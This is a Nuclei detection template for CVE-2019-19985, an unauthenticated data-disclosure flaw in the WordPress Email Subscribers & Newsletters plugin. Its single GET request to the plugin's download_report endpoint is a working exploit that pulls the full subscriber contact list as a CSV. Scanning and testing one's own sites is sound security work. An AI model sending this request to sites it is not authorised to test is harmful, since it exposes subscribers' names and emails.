nuclei-templates/cves/2019/CVE-2019-19985.yaml

44 lines
1.4 KiB
YAML

id: CVE-2019-19985
info:
name: WordPress Email Subscribers & Newsletters <4.2.2 - Arbitrary File Retrieval
author: KBA@SOGETI_ESEC,madrobot,dwisiswant0
severity: medium
description: The WordPress plugin Email Subscribers & Newsletters before 4.2.3 contains a flaw that allows unauthenticated file download and user information disclosure.
reference:
- https://www.exploit-db.com/exploits/48698
- https://wpvulndb.com/vulnerabilities/9946
- https://www.wordfence.com/blog/2019/11/multiple-vulnerabilities-patched-in-email-subscribers-newsletters-plugin/
- http://packetstormsecurity.com/files/158563/WordPress-Email-Subscribers-And-Newsletters-4.2.2-File-Disclosure.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2019-19985
cwe-id: CWE-862
tags: cve2019,wordpress,wp-plugin,edb,packetstorm,cve
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"
matchers-condition: and
matchers:
- type: word
words:
- Name
- Email
- Status
- Created On
condition: and
part: body
- type: word
words:
- "Content-Disposition: attachment; filename=all-contacts.csv;"
part: header
- type: status
status:
- 200